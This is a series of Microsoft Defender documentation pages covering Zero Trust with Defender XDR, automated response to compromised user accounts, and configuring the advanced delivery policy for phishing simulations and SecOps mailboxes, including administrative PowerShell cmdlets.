-In the illustration: Microsoft Defender XDR provides XDR capabilities for protecting:
--- Endpoints, including laptops and mobile devices-- Data in Office 365, including email-- Cloud apps, including other SaaS apps that your organization uses-- On-premises Active Directory Domain Services (AD DS) and Active Directory Federated Services (AD FS) servers-
-Microsoft Defender XDR helps you apply the principles of Zero Trust in the following ways:
-
-| Zero Trust principle | Met by |
-| | |
-| Verify explicitly | Microsoft Defender XDR provides XDR across users, identities, devices, apps, and emails. |
-| Use least privileged access | If used with Microsoft Entra ID Protection, Microsoft Defender XDR blocks users based on the level of risk posed by an identity. Microsoft Entra ID Protection is licensed separately from Microsoft Defender XDR and is included with Microsoft Entra ID P2. |
-| Assume breach | Microsoft Defender XDR continuously scans the environment for threats and vulnerabilities. It can implement automated remediation tasks, including automated investigations and isolating endpoints. |
-
-To add Microsoft Defender XDR to your Zero Trust strategy and architecture, go to [Evaluate and pilot Microsoft Defender XDR](eval-overview.md) for a methodical guide to piloting and deploying Microsoft Defender XDR components. The following table summarizes what these topics include.
-
-|Includes|Prerequisites|Doesn't include|
-||||
-| Set up the evaluation and pilot environment for all components: <ul><li>Defender for Identity</li><li>Defender for Office 365</li><li>Defender for Endpoint</li><li>Microsoft Defender for Cloud Apps</li></ul> <br> Protect against threats <br><br> Investigate and respond to threats | See the guidance for the architecture requirements for each component of Microsoft Defender XDR. | Microsoft Entra ID Protection is not included in this solution guide. It is included in [Step 1. Configure Zero Trust identity and device access protection](../microsoft-365-zero-trust.md#step-1-configure-zero-trust-identity-and-device-access-protection-starting-point-policies). |
-
-## Next steps
-
-Learn more about Zero Trust for Microsoft Defender XDR
--- [Defender for Endpoint](../defender-endpoint/zero-trust-with-microsoft-defender-endpoint.md)-- [Defender for Office 365](../office-365-security/zero-trust-with-microsoft-365-defender-office-365.md)-- [Defender for Cloud Apps](/defender-cloud-apps/zero-trust)-- [Defender for Identity](/defender-for-identity/zero-trust)-
-Learn more about other Microsoft 365 capabilities that contribute to a strong Zero Trust strategy and architecture with the [Zero Trust deployment plan with Microsoft 365](../Microsoft-365-zero-trust.md).
-
-Learn more about Zero Trust and how to build an enterprise-scale strategy and architecture with the [Zero Trust Guidance Center](/security/zero-trust).
security Address Compromised Users Quickly https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/address-compromised-users-quickly.md
- Title: Address compromised user accounts with automated investigation and response----
- - MET150
- - MOE150
-
- - m365-security
- - tier2
- Previously updated : 06/09/2023
-description: Learn how to speed up the process of detecting and addressing compromised user accounts with automated investigation and response capabilities in Microsoft Defender for Office 365 Plan 2.
-
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Address compromised user accounts with automated investigation and response
--
-[Microsoft Defender for Office 365 Plan 2](mdo-about.md#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet) includes powerful [automated investigation and response](air-about.md) (AIR) capabilities. Such capabilities can save your security operations team a lot of time and effort dealing with threats. This article describes one of the facets of the AIR capabilities, the compromised user security playbook.
-
-The compromised user security playbook enables your organization's security team to:
--- Speed up detection of compromised user accounts;-- Limit the scope of a breach when an account is compromised; and-- Respond to compromised users more effectively and efficiently.-
-## Compromised user alerts
-
-When a user account is compromised, atypical or anomalous behaviors occur. For example, phishing and spam messages might be sent internally from a trusted user account. Defender for Office 365 can detect such anomalies in email patterns and collaboration activity within Office 365. When this happens, alerts are triggered, and the threat mitigation process begins.
-
-## Investigate and respond to a compromised user
-
-When a user account is compromised, alerts are triggered. And in some cases, that user account is blocked and prevented from sending any further email messages until the issue is resolved by your organization's security operations team. In other cases, an automated investigation begins which can result in recommended actions that your security team should take.
--- [View and investigate restricted users](#view-and-investigate-restricted-users)--- [View details about automated investigations](#view-details-about-automated-investigations)-
-> [!IMPORTANT]
-> You must have appropriate permissions to perform the following tasks. See [Required permissions to use AIR capabilities](air-about.md#required-permissions-to-use-air-capabilities).
-
-Watch this short video to learn how you can detect and respond to user compromise in Microsoft Defender for Office 365 using Automated Investigation and Response (AIR) and compromised user alerts.
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RWAl83]
-
-### View and investigate restricted users
-
-You have a few options for navigating to a list of restricted users. For example, in the Microsoft Defender portal, you can go to **Email & collaboration** \> **Review** \> **Restricted Users**. The following procedure describes navigation using the **Alerts** dashboard, which is a good way to see various kinds of alerts that might have been triggered.
-
-1. Open the Microsoft Defender portal at <https://security.microsoft.com> and go to **Incidents & alerts** \> **Alerts**. Or, to go directly to the **Alerts** page, use <https://security.microsoft.com/alerts>.
-
-2. On the **Alerts** page, filter the results by time period and the policy named **User restricted from sending email**.
-
- :::image type="content" source="../../media/m365-sc-alerts-page-with-restricted-user.png" alt-text="The Alerts page in the Microsoft Defender portal filtered for restricted users" lightbox="../../media/m365-sc-alerts-page-with-restricted-user.png":::
-
-3. If you select the entry by clicking on the name, a **User restricted from sending email** page opens with additional details for you to review. Next to the **Manage alert** button, you can click :::image type="icon" source="../../medi).
-
- :::image type="content" source="../../media/m365-sc-alerts-user-restricted-from-sending-email-page.png" alt-text="The User restricted from sending email page" lightbox="../../media/m365-sc-alerts-user-restricted-from-sending-email-page.png":::
-
-### View details about automated investigations
-
-When an automated investigation has begun, you can see its details and results in the **Action center** in the Microsoft Defender portal.
-
-To learn more, see [View details of an investigation](air-view-investigation-results.md).
-
-## Keep the following points in mind
--- **Stay on top of your alerts**. As you know, the longer a compromise goes undetected, the larger the potential for widespread impact and cost to your organization, customers, and partners. Early detection and timely response are critical to mitigate threats, and especially when a user's account is compromised.--- **Automation assists your security operations team**. Automated investigation and response capabilities can detect a compromised user early on and enable your security operations team to take action to remediate the threat. Need some help with this? See [Review and approve actions](air-review-approve-pending-completed-actions.md).-
-## Next steps
--- [Review the required permissions to use AIR capabilities](air-about.md#required-permissions-to-use-air-capabilities)--- [Find and investigate malicious email in Office 365](threat-explorer-investigate-delivered-malicious-email.md)--- [Learn about AIR in Microsoft Defender for Endpoint](/windows/security/threat-protection/microsoft-defender-atp/automated-investigations)--- [Visit the Microsoft 365 Roadmap to see what's coming soon and rolling out](https://www.microsoft.com/microsoft-365/roadmap?filters=)
security Advanced Delivery Policy Configure https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/advanced-delivery-policy-configure.md
- Title: Configure the advanced delivery policy for third-party phishing simulations and email delivery to SecOps mailboxes
- - NOCSH
----
- - MET150
-
- - m365-security
- - tier3
-
-description: Admins can learn how to use the advanced delivery policy in Exchange Online Protection (EOP) to identify messages that shouldn't be filtered in specific supported scenarios (third-party phishing simulations and messages delivered to security operations (SecOps) mailboxes.
- Previously updated : 11/2/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Configure the advanced delivery policy for third-party phishing simulations and email delivery to SecOps mailboxes
--
-To keep your organization [secure by default](secure-by-default.md), Exchange Online Protection (EOP) doesn't allow safe lists or filtering bypass for messages that are identified as malware or high confidence phishing. But, there are specific scenarios that require the delivery of unfiltered messages. For example:
--- **Third-party phishing simulations**: Simulated attacks can help you identify and train vulnerable users before a real attack impacts your organization.-- **Security operations (SecOps) mailboxes**: Dedicated mailboxes that are used by security teams to collect and analyze unfiltered messages (both good and bad).-
-Use the _advanced delivery policy_ in EOP to prevent inbound messages _in these specific scenarios_ from being filtered┬╣. The advanced delivery policy ensures that messages in these scenarios achieve the following results:
--- Filters in EOP and Defender for Office 365 take no action on these messages. Malware filtering is bypassed for SecOps mailboxes only.-- [Zero-hour Purge (ZAP)](zero-hour-auto-purge.md) for spam and phishing take no action on these messages. ZAP for malware is bypassed for SecOps mailboxes only.-- [Safe Links in Defender for Office 365](safe-links-about.md) doesn't block or detonate the specified URLs in these messages at time of click. URLs are still wrapped, but they aren't blocked.-- [Safe Attachments in Defender for Office 365](safe-attachments-about.md) doesn't detonate attachments in these messages.-- [Default system alerts](/purview/alert-policies#default-alert-policies) aren't triggered for these scenarios.-- [AIR and clustering in Defender for Office 365](air-about.md) ignores these messages.-- Specifically for third-party phishing simulations:
- - [Admin submission](submissions-admin.md) generates an automatic response saying that the message is part of a phishing simulation campaign and isn't a real threat. Alerts and AIR aren't triggered. The admin submissions experience shows these messages as a simulated threat.
- - When a user reports a phishing simulation message using the [built-in Report button in Outlook on the web](submissions-outlook-report-messages.md#use-the-built-in-report-button-in-outlook-on-the-web) or the [Microsoft Report Message or Report Phishing add-ins](submissions-outlook-report-messages.md#use-the-report-message-and-report-phishing-add-ins-in-outlook), the system doesn't generate an alert, investigation, or incident. The links or files aren't detonated, but the message appears on the **User reported** tab of the **Submissions** page.
-
-Messages that are identified by the advanced delivery policy aren't security threats, so the messages are marked with system overrides. Admin experiences show these messages as **Phishing simulation** or **SecOps mailbox** system overrides. Admins can use these values to filter and analyze messages in the following experiences:
--- [Threat Explorer (Explorer) or Real-time detections in Defender for Office 365](threat-explorer-real-time-detections-about.md): Admins can filter on **System override source** and select **Phishing simulation** or **SecOps Mailbox**.-- The [Email entity page](mdo-email-entity-page.md): Admins can view a message that was allowed by organization policy by **SecOps mailbox** or **Phishing simulation** under **Tenant override** in the **Override(s)** section.-- The [Threat protection status report](reports-email-security.md#threat-protection-status-report): Admin can filter by **view data by System override** in the drop down menu and select to see messages allowed due to a phishing simulation system override. To see messages allowed by the SecOps mailbox override, you can select **chart breakdown by delivery location** in the **chart breakdown by reason** dropdown list.-- [Advanced hunting in Microsoft Defender for Endpoint](../defender-endpoint/advanced-hunting-overview.md): Phishing simulation and SecOps mailbox system overrides are options within OrgLevelPolicy in EmailEvents.-- [Campaign Views](campaigns.md): Admin can filter on **System override source** and select either **Phishing simulation** or **SecOps Mailbox**.-
-## What do you need to know before you begin?
--- You open the Microsoft Defender portal at <https://security.microsoft.com>. To go directly to the **Advanced delivery** page, use <https://security.microsoft.com/advanceddelivery>.--- To connect to Exchange Online PowerShell, see [Connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell).--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](../defender/manage-rbac.md) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.
- - [Email & collaboration permissions in the Microsoft Defender portal](mdo-portal-permissions.md) and [Exchange Online permissions](/exchange/permissions-exo/permissions-exo):
- - _Create, modify, or remove configured settings in the advanced delivery policy_: Membership in the **Security Administrator** role groups in Email & collaboration RBAC <u>and</u> membership in the **Organization Management** role group in Exchange Online RBAC.
- - _Read-only access to the advanced delivery policy_: Membership in the **Global Reader** or **Security Reader** role groups in Email & collaboration RBAC.
- - **View-Only Organization Management** in Exchange Online RBAC.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator**, **Security Administrator**, **Global Reader**, or **Security Reader** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.
-
-## Use the Microsoft Defender portal to configure SecOps mailboxes in the advanced delivery policy
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Advanced delivery** in the **Rules** section. Or, to go directly to the **Advanced delivery** page, use <https://security.microsoft.com/advanceddelivery>.
-
- On the **Advanced delivery** page, verify that the **SecOps mailbox** tab is selected.
-
-2. On the **SecOps mailbox** tab, select the **Add** button in the **No SecOps mailboxes configured** area of the page.
-
- If there are already existing entries on the **SecOps mailbox** tab, select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit** (the **Add** button isn't available).
-
-3. In the **Add SecOps mailboxes** flyout that opens, enter an existing Exchange Online mailbox that you want to designate as SecOps mailbox by doing either of the following steps:
- - Click in the box, let the list of mailboxes resolve, and then select the mailbox.
- - Click in the box start typing an identifier for the mailbox (name, display name, alias, email address, account name, etc.), and select the mailbox (display name) from the results.
-
- Repeat this step as many times as necessary. Distribution groups aren't allowed.
-
- To remove an existing value, select remove :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to the value.
-
-4. When you're finished in the **Add SecOps mailboxes** flyout, select **Add**..
-
-5. Review the information in the **Changes to SecOps mailbox override saved** flyout, and then select **Close**.
-
-Back on the **SecOps mailbox** tab, the SecOps mailbox entries that you configured are now listed:
--- The **Display name** column contains display name of the mailboxes.-- The **Email** column contains the email address for each entry.-- To change the list of entries from normal to compact spacing, select :::image type="icon" source="../../media/m365-cc-sc-standard-icon.png" border="false"::: **Change list spacing to compact or normal**, and then select :::image type="icon" source="../../media/m365-cc-sc-compact-icon.png" border="false"::: **Compact list**.-
-## Use the Microsoft Defender portal to modify or remove SecOps mailboxes in the advanced delivery policy
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Advanced delivery** in the **Rules** section. Or, to go directly to the **Advanced delivery** page, use <https://security.microsoft.com/advanceddelivery>.
-
- On the **Advanced delivery** page, verify that the **SecOps mailbox** tab is selected.
-
-2. On the **SecOps mailbox** tab, select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit**.
-
-3. In **Edit SecOps mailboxes** flyout that opens, add or remove mailboxes as described in Step 3 in the [Use the Microsoft Defender portal to configure SecOps mailboxes in the advanced delivery policy](#use-the-microsoft-defender-portal-to-configure-secops-mailboxes-in-the-advanced-delivery-policy) section.
-
- To remove all mailboxes, select remove :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to each value until there are no more mailboxes selected.
-
-4. When you're finished in the **Edit SecOps mailboxes** flyout, select **Save**.
-
-5. Review the information in the **Changes to SecOps mailbox override saved** flyout, and then select **Close**.
-
-Back on the **SecOps mailbox** tab, the SecOps mailbox entries that you configured are displayed. If you removed all entries, the list is empty.
-
-## Use the Microsoft Defender portal to configure third-party phishing simulations in the advanced delivery policy
-
-To configure a third-party phishing simulation, you need to provide the following information:
--- At least one **Domain**: The domain from the MAIL FROM address (also known as the `5321.MailFrom` address, P1 sender, or envelope sender) that's used in the SMTP transmission of the message **or** a DKIM domain as specified by the phishing simulation vendor.-- At least one **Sending IP**.-- For **non-email** phishing simulations (for example, Microsoft Teams messages, Word documents, or Excel spreadsheets), you can optionally identify the **Simulation URLs to allow** that shouldn't be treated as real threats at time of click: the URLs aren't blocked or detonated, and no URL click alerts or resulting incidents are generated. The URLs are wrapped at time of click, but they aren't blocked.-
-There must be a match on at least one **Domain** and one **Sending IP**, but no association between values is maintained.
-
-If your MX record doesn't point to Microsoft 365, the IP address in the `Authentication-results` header must match the IP address in the advanced delivery policy. If the IP addresses don't match, you might need to configure [Enhanced Filtering for Connectors](/Exchange/mail-flow-best-practices/use-connectors-to-configure-mail-flow/enhanced-filtering-for-connectors) so the correct IP address is detected.
-
-> [!NOTE]
-> Enhanced Filtering for Connectors doesn't work for third-party phishing simulations in complex email routing scenarios (for example, email from the internet is routed to Microsoft 365, then to an on-premises environment or third-party security service, and then back to Microsoft 365). EOP can't identify the true IP address of the message source. Don't try to work around this limitation by adding the IP addresses of the on-premises or third-party sending infrastructure to the third-party phishing simulation. Doing so effectively bypasses spam filtering for any internet sender who impersonates the domain that's specified in the third-party phishing simulation.
->
-> Currently, the advanced delivery policy for third-party phishing simulations doesn't support simulations within the same organization (`DIR:INT`), especially when email is routed through an Exchange Server gateway before Microsoft 365 in Hybrid mail flow. To work around this issue, you have the following options:
->
-> - Create a dedicated [send connector](/exchange/mail-flow/mail-routing/connector-selection) that doesn't authenticate the phishing simulation messages as internal.
-> - Configure the phishing simulation to bypass the Exchange Server infrastructure and route mail directly to your Microsoft 365 MX record (for example, contoso-com.mail.protection.outlook.com).
-> - Although you can set intra-organization message scanning to None in [anti-spam policies](anti-spam-policies-configure.md#use-the-microsoft-defender-portal-to-create-anti-spam-policies) we don't recommend this option because it affects other email messages.
->
-> If you're using the [Built-in protection preset security policy](preset-security-policies.md#profiles-in-preset-security-policies) or your custom Safe Links policies have the setting **Do not rewrite URLs, do checks via SafeLinks API only** enabled, time of click protection doesn't treat phishing simulation links in email as threats in Outlook on the web, Outlook for iOS and Android, Outlook for Windows v16.0.15317.10000 or later, and Outlook for Mac v16.74.23061100 or later. If you're using older versions of Outlook, consider disabling the **Do not rewrite URLs, do checks via SafeLinks API only** setting in custom Safe Links policies.
->
-> Adding phishing simulation URLs to the **Do not rewrite the following URLs in email** section in Safe Links policies might result in unwanted alerts for URL clicks. Phishing simulation URLs in email messages are automatically allowed both during mail flow and at time of click.
->
-> Currently, the advanced delivery policy for SecOps mailboxes doesn't support intra-organizational messages (`DIR:INT`), and these messages will be quarantined. As a workaround, you can use an separate anti-spam policy for SecOps mailboxes that doesn't quarantine intra-organizational messages. We don't recommend disabling intra-org protection for all mailboxes.
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Advanced delivery** in the **Rules** section. Or, to go directly to the **Advanced delivery** page, use <https://security.microsoft.com/advanceddelivery>.
-
- On the **Advanced delivery** page, select the **Phishing simulation** tab.
-
-2. On the **Phishing simulation** tab, select the **Add** button in the **No third party phishing simulations configured** area of the page.
-
- If there are already existing entries on the **Phishing simulation** tab, select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit** (the **Add** button isn't available).
-
-3. In the **Add third party phishing simulations** flyout that opens, configure the following settings:
-
- - **Domain**: Expand this setting and enter at least one email address domain by clicking in the box, entering a value (for example, contoso.com), and then pressing the ENTER key or selecting the value that's displayed below the box. Repeat this step as many times as necessary. You can add up to 50 entries. Use one of the following values:
- - The domain in the `5321.MailFrom` address (also known as the **MAIL FROM** address, P1 sender, or envelope sender) that's used in the SMTP transmission of the message.
- - The DKIM domain as specified by the phishing simulation vendor.
-
- - **Sending IP**: Expand this setting and enter at least one valid IPv4 address by clicking in the box, entering a value, and then pressing the ENTER key or selecting the value that's displayed below the box. Repeat this step as many times as necessary. You can add up to 10 entries. Valid values are:
- - Single IP: For example, 192.168.1.1.
- - IP range: For example, 192.168.0.1-192.168.0.254.
- - CIDR IP: For example, 192.168.0.1/25.
-
- - **Simulation URLs to allow**: This setting isn't required for links in email phishing simulations. Use this setting to optionally identify links in **non-email** phishing simulations (links in Teams messages or in Office documents) that shouldn't be treated as real threats at time of click.
-
- Add URL entries by expanding this setting, clicking in the box, entering a value, and then pressing the ENTER key or selecting the value that's displayed below the box. You can add up to 30 entries. For the URL syntax, see [URL syntax for the Tenant Allow/Block List](tenant-allow-block-list-urls-configure.md#url-syntax-for-the-tenant-allowblock-list).
-
- To remove an existing domain, IP, or URL value, select remove :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to the value.
-
- Consider the following example:
-
- ```text
- Authentication-Results: spf=pass (sender IP is 172.17.17.7)
- smtp.mailfrom=contoso.com; dkim=pass (signature was verified)
- header.d=contoso-simulation.com; dmarc=pass action=none header.from=contoso-simulation.com;
-
- DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=contoso-simulation.com;
- s=selector1;
- h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-SenderADCheck;
- bh=UErATeHehIIPIXPeUAfZWiKo0w2cSsOhb9XM9ulqTX0=;
- ```
-
- - The connecting IP address is **172.17.17.7**.
- - The domain in the MAIL FROM address (`smtp.mailfrom`) is **contoso.com**.
- - The DKIM domain (`header.d`) is **contoso-simulation.com**.
-
- From the example, you can use one of the following combinations to configure a third-party phishing simulation:
-
- **Domain**: contoso.com<br/>
- **Sending IP**: 172.17.17.7
-
- **Domain**: contoso-simulation.com<br/>
- **Sending IP**: 172.17.17.7
-
-4. When you're finished in the **Add third party phishing simulations** flyout, select **Add**.
-
-5. Review the information in the **Changes to phishing simulation override saved** flyout, and then select **Close**.
-
-Back on the **Phishing simulation** tab, the third-party phishing simulation entries that you configured are now listed:
--- The **Value** column contains the domain, IP address or URL entry.-- The **Type** column contains the value **Sending IP**, **Domain**, or **Allowed simulation URL** for each entry.-- The **Date** column shows when the entry was created.-- To change the list of entries from normal to compact spacing, select :::image type="icon" source="../../media/m365-cc-sc-standard-icon.png" border="false"::: **Change list spacing to compact or normal**, and then select :::image type="icon" source="../../media/m365-cc-sc-compact-icon.png" border="false"::: **Compact list**.-
-## Use the Microsoft Defender portal to modify or remove third-party phishing simulations in the advanced delivery policy
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Advanced delivery** in the **Rules** section. Or, to go directly to the **Advanced delivery** page, use <https://security.microsoft.com/advanceddelivery>.
-
- On the **Advanced delivery** page, select the **Phishing simulation** tab.
-
-2. On the **Phishing simulation** tab, select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit**.
-
-3. In the **Edit third-party phishing simulation** flyout that opens, add or remove entries for **Domain**, **Sending IP**, and **Simulation URLs** as described in Step 3 in the [Use the Microsoft Defender portal to configure SecOps mailboxes in the advanced delivery policy](#use-the-microsoft-defender-portal-to-configure-secops-mailboxes-in-the-advanced-delivery-policy) section.
-
- To remove all entries, select remove :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to each value until there are no more domains, IPs, or URLs selected.
-
-4. When you're finished in the **Edit third-party phishing simulation** flyout, select **Save**.
-
-5. Review the information in the **Changes to phishing simulation override saved** flyout, and then select **Close**.
-
-Back on the **Phishing simulation** tab, the third-party phishing simulation entries that you configured are displayed. If you removed all entries, the list is empty.
-
-## Additional scenarios that require filtering bypass
-
-In addition to the two scenarios that the advanced delivery policy can help you with, there are other scenarios where you might need to bypass filtering for messages:
--- **Third-party filters**: If your domain's MX record _doesn't_ point to Office 365 (messages are routed somewhere else first), [secure by default](secure-by-default.md) _isn't available_. If you'd like to add protection, you need to enable Enhanced Filtering for Connectors (also known as _skip listing_). For more information, see [Manage mail flow using a third-party cloud service with Exchange Online](/exchange/mail-flow-best-practices/manage-mail-flow-using-third-party-cloud). If you don't want Enhanced Filtering for Connectors, use mail flow rules (also known as transport rules) to bypass Microsoft filtering for messages that have already been evaluated by third-party filtering. For more information, see [Use mail flow rules to set the SCL in messages](/exchange/security-and-compliance/mail-flow-rules/use-rules-to-set-scl).--- **False positives under review**: You might want to _temporarily_ allow good messages that are incorrectly identified as bad (false positives) that you reported via [admin submissions](submissions-admin.md), but the messages are still being analyzed by Microsoft. As with all overrides, we _**highly recommended**_ that these allowances are temporary.-
-## PowerShell procedures for SecOps mailboxes in the advanced delivery policy
-
-In PowerShell, the basic elements of SecOps mailboxes in the advanced delivery policy are:
--- **The SecOps override policy**: Controlled by the **\*-SecOpsOverridePolicy** cmdlets.-- **The SecOps override rule**: Controlled by the **\*-ExoSecOpsOverrideRule** cmdlets.-
-This behavior has the following results:
--- You create the policy first, then you create the rule that identifies the policy that the rule applies to.-- When you remove a policy from PowerShell, the corresponding rule is also removed.-- When you remove a rule from PowerShell, the corresponding policy isn't removed. You need to remove the corresponding policy manually.-
-### Use PowerShell to configure SecOps mailboxes
-
-Configuring a SecOps mailbox in the advanced delivery policy in PowerShell is a two-step process:
-
-1. Create the SecOps override policy.
-2. Create the SecOps override rule that specifies the policy that the rule applies to.
-
-#### Step 1: Use PowerShell to create the SecOps override policy
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), use the following syntax:
-
-```powershell
-New-SecOpsOverridePolicy -Name SecOpsOverridePolicy -SentTo <EmailAddress1>,<EmailAddress2>,...<EmailAddressN>
-```
-
-Regardless of the Name value you specify, the policy name is _SecOpsOverridePolicy_, so you might as well use that value.
-
-This example creates the SecOps mailbox policy.
-
-```powershell
-New-SecOpsOverridePolicy -Name SecOpsOverridePolicy -SentTo secops@contoso.com
-```
-
-For detailed syntax and parameter information, see [New-SecOpsOverridePolicy](/powershell/module/exchange/new-secopsoverridepolicy).
-
-#### Step 2: Use PowerShell to create the SecOps override rule
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), run the following command:
-
-```powershell
-New-ExoSecOpsOverrideRule -Name SecOpsOverrideRule -Policy SecOpsOverridePolicy
-```
-
-Regardless of the Name value you specify, the rule name will be `_Exe:SecOpsOverrid:<GUID\>` \[sic\] where \<GUID\> is a unique GUID value (for example, 312c23cf-0377-4162-b93d-6548a9977efb9).
-
-For detailed syntax and parameter information, see [New-ExoSecOpsOverrideRule](/powershell/module/exchange/new-ExoSecOpsOverrideRule).
-
-### Use PowerShell to view the SecOps override policy
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), this example returns detailed information about the one and only SecOps mailbox policy.
-
-```powershell
-Get-SecOpsOverridePolicy
-```
-
-For detailed syntax and parameter information, see [Get-SecOpsOverridePolicy](/powershell/module/exchange/get-secopsoverridepolicy).
-
-### Use PowerShell to view SecOps override rules
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), this example returns detailed information about SecOps override rules.
-
-```powershell
-Get-ExoSecOpsOverrideRule
-```
-
-Although the previous command should return only one rule, a rule that's pending deletion might also be included in the results.
-
-This example identifies the valid rule (one) and any invalid rules.
-
-```powershell
-Get-ExoSecOpsOverrideRule | Format-Table Name,Mode
-```
-
-After you identify the invalid rules, you can remove them by using the **Remove-ExoSecOpsOverrideRule** cmdlet as described [later in this article](#use-powershell-to-remove-secops-override-rules).
-
-For detailed syntax and parameter information, see [Get-ExoSecOpsOverrideRule](/powershell/module/exchange/get-exosecopsoverriderule).
-
-### Use PowerShell to modify the SecOps override policy
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), use the following syntax:
-
-```powershell
-Set-SecOpsOverridePolicy -Identity SecOpsOverridePolicy [-AddSentTo <EmailAddress1>,<EmailAddress2>,...<EmailAddressN>] [-RemoveSentTo <EmailAddress1>,<EmailAddress2>,...<EmailAddressN>]
-```
-
-This example adds `secops2@contoso.com` to the SecOps override policy.
-
-```powershell
-Set-SecOpsOverridePolicy -Identity SecOpsOverridePolicy -AddSentTo secops2@contoso.com
-```
-
-> [!NOTE]
-> If an associated, valid SecOps override rule exists, the email addresses in the rule is also updated.
-
-For detailed syntax and parameter information, see [Set-SecOpsOverridePolicy](/powershell/module/exchange/set-secopsoverridepolicy).
-
-### Use PowerShell to modify a SecOps override rule
-
-The **Set-ExoSecOpsOverrideRule** cmdlet doesn't modify the email addresses in the SecOps override rule. To modify the email addresses in the SecOps override rule, use the **Set-SecOpsOverridePolicy** cmdlet.
-
-For detailed syntax and parameter information, see [Set-ExoSecOpsOverrideRule](/powershell/module/exchange/set-exosecopsoverriderule).
-
-### Use PowerShell to remove the SecOps override policy
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), this example removes the SecOps Mailbox policy and the corresponding rule.
-
-```powershell
-Remove-SecOpsOverridePolicy -Identity SecOpsOverridePolicy
-```
-
-For detailed syntax and parameter information, see [Remove-SecOpsOverridePolicy](/powershell/module/exchange/remove-secopsoverridepolicy).
-
-### Use PowerShell to remove SecOps override rules
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), use the following commands:
--- Remove any SecOps override rules:-
- ```powershell
- Get-ExoSecOpsOverrideRule | Remove-ExoSecOpsOverrideRule
- ```
--- Remove the specified SecOps override rule:-
- ```powershell
- Remove-ExoSecOpsOverrideRule -Identity "_Exe:SecOpsOverrid:312c23cf-0377-4162-b93d-6548a9977efb"
- ```
-
-For detailed syntax and parameter information, see [Remove-ExoSecOpsOverrideRule](/powershell/module/exchange/remove-exosecopsoverriderule).
-
-## PowerShell procedures for third-party phishing simulations in the advanced delivery policy
-
-In PowerShell, the basic elements of third-party phishing simulations in the advanced delivery policy are:
--- **The phishing simulation override policy**: Controlled by the **\*-PhishSimOverridePolicy** cmdlets.-- **The phishing simulation override rule**: Controlled by the **\*-ExoPhishSimOverrideRule** cmdlets.-- **The allowed (unblocked) phishing simulation URLs**: Controlled by the **\*-TenantAllowBlockListItems** cmdlets.-
-> [!NOTE]
-> As previously described, identifying URLs isn't required for links in email-based phishing simulations. You can optionally identify links in **non-email** phishing simulations (links in Teams messages or in Office documents) that shouldn't be treated as real threats at time of click.
-
-This behavior has the following results:
--- You create the policy first, then you create the rule that identifies the policy that the rule applies to.-- You modify the settings in the policy and the rule separately.-- When you remove a policy from PowerShell, the corresponding rule is also removed.-- When you remove a rule from PowerShell, the corresponding policy isn't removed. You need to remove the corresponding policy manually.-
-### Use PowerShell to configure third-party phishing simulations
-
-Configuring a third-party phishing simulation in PowerShell is a multi-step process:
-
-1. Create the phishing simulation override policy.
-2. Create the phishing simulation override rule that specifies:
- - The policy that the rule applies to.
- - The source IP address of the phishing simulation messages.
